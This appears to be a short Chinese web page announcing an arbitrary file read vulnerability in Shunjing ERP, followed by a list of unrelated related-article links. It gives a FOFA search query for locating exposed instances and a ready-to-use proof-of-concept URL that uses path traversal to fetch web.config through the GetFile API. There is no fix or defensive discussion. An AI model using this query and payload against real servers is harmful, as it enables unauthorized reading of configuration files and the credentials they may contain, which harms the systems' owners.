当前位置: 首页 > article >正文

顺景ERP 任意文件读取漏洞

article 2025/4/2 3:15:35

fofa查询语句

body="/api/DBRecord/getDBRecords"

漏洞验证

漏洞链接:http://xx.xx.xx.xx/api/TMScmQuote/GetFileFullGuidFileName=/../web.config&FileName=


http://www.kler.cn/a/621208.html

相关文章:

  • swagger问题解决
  • java倒序题变形题重温
  • H5S USC 宇视LiteAPI协议支持
  • Qwt入门
  • 蓝卓为中小制造企业注入数字化转型活力
  • 《算法竞赛进阶指南》0x10章目录
  • todesk控制端没声音 控制声音位置
  • Html 页面图标的展示列表
  • 二次开发海康大华摄像头在线rtsp推流播放
  • Vue 中如何使用 v-model 实现自定义组件的双向绑定?
  • 创作领域“<em >赚</em><em>钱</em><em>平</em><em>台</em><em>网</em><em>站
  • git的clone报错unable to access 443
  • 开源等宽编程字体 Maple Mono 正式发布 7.0
  • 最长子序列
  • 关于为什么使用redis锁,不使用zk锁的原因
  • Centos7安装cat美化工具lolcat
  • qml语法解释
  • Linux系统:进程状态与僵尸、孤儿进程
  • MySQL Binlog
  • Python+拉普拉斯变换求解微分方程